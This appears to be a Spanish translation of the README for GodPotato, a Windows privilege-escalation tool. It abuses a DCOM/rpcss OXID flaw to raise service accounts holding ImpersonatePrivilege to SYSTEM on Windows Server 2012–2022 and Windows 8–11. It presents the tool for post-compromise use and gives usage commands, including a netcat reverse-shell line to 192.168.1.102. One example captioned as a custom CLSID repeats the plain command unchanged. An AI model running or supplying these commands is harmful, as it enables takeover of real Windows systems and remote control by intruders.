
Herramienta de escalada de privilegios basada en DCOM para Windows Server 2012-2022 y Windows 8-11, elevando usuarios con ImpersonatePrivilege a NT AUTHORITY\SYSTEM a través de la vulnerabilidad rpcss oxid.
Basado en la historia de la escalada de privilegios Potato durante 6 años, desde el principio de RottenPotato hasta el final de JuicyPotatoNG, descubrí una nueva tecnología al investigar DCOM, que permite la escalada de privilegios en Windows 2012 - Windows 2022, ahora siempre que tengas permiso "ImpersonatePrivilege". Entonces eres "NT AUTHORITY\SYSTEM", normalmente los servicios WEB y de bases de datos tienen permisos "ImpersonatePrivilege".
La escalada de privilegios Potato se usa generalmente cuando obtenemos privilegios WEB/bases de datos. Podemos elevar un usuario de servicio con bajos privilegios a privilegios "NT AUTHORITY\SYSTEM". Sin embargo, el histórico Potato no tiene forma de ejecutarse en el sistema Windows más reciente. Cuando investigaba DCOM, encontré un nuevo método que puede realizar escalada de privilegios. Hay algunos defectos en rpcss al tratar con oxid, y rpcss es un servicio que debe ser abierto por el sistema. , por lo que puede ejecutarse en casi cualquier sistema operativo Windows, lo llamé GodPotato
Windows Server 2012 - Windows Server 2022 Windows8 - Windows 11
FFFFF FFF FFFFFFF
FFFFFFF FFF FFFFFFFF
FFF FFFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFFF FFFFFFF FFFFFFFF FFF FFF FFFFFFF FFFFFFFFF FFFFFF FFFFFFFFF FFFFFF
FFFF FFFF FFFF FFF FFFF FFF FFFF FFFF FFFF FFF FFF FFF FFF FFF FFFF
FFFF FFFFF FFF FFF FFF FFF FFFFFFFF FFF FFF FFF F FFF FFF FFF FFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFF FFF FFF FFFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFFFFF FFF FFF FFFF
FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFFF FFF FFF FFF FFFF
FFFF FFFF FFFF FFF FFFF FFF FFF FFF FFFF FFF FFFF FFF FFF FFFF FFF
FFFFFFFF FFFFFFF FFFFFFFF FFF FFFFFFF FFFFFF FFFFFFFF FFFFFFF FFFFFFF
FFFFFFF FFFFF FFFFFFF FFF FFFFF FFFFF FFFFFFFF FFFF FFFF
Argumentos:
-cmd Requerido:True LíneaDeComandos (por defecto cmd /c whoami)
Ejemplo:
GodPotato -cmd "cmd /c whoami"
Use el Clsid integrado del programa para la escalada de privilegios y ejecute un comando simple
GodPotato -cmd "cmd /c whoami"

Personalice Clsid y ejecute comandos
GodPotato -cmd "cmd /c whoami"

Ejecute comandos de shell inversa
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
zcgonvh
skay